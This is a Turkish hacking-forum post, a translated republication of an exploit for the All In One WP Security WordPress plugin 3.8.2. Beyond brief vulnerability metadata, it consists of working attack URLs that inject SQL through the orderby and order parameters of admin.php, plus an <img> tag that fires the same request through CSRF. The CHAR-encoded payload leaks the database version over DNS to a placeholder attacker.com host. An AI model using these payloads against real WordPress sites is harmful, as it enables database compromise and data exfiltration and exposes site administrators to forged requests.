Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2768
Mesaj Sayısı: 6324
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı
28.09.2014 16:09








Kod:
Not => Videolar alıntıdır.

Ürünün İsmi => All In One WP Security WordPress plugin
Açığın Bulunma Tarihi => 3Eylül 2014
Risk Düzeyi => Orta Derecede
Çözüm => Patch yayımlandı ve çözüldü.

Açığın Oluşma Sebebi => "/wp-admin/admin.php" skriptinde HTTP parameter komutundan kaynaklanıyor.

SQL Enjeksiyon Saldırısı
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select​%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2​897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%​2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHA​R%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
CSRF Saldırısı
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%​20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%28​97%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2​899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR​%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
3. CSRF Saldırısına devamı
<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select​%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2​897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%​2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHA​R%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">

Not => Hitech Bridge adlı grupun yayımlamış olduğu açığıu Cyberizm.Org'dan KingSkrupellos ingilizceden Türkçeye çevirmiştir.
İngilizce Kaynak
http://www.exploit-db.com/exploits/34781/
Alinti



1 Ziyaretçi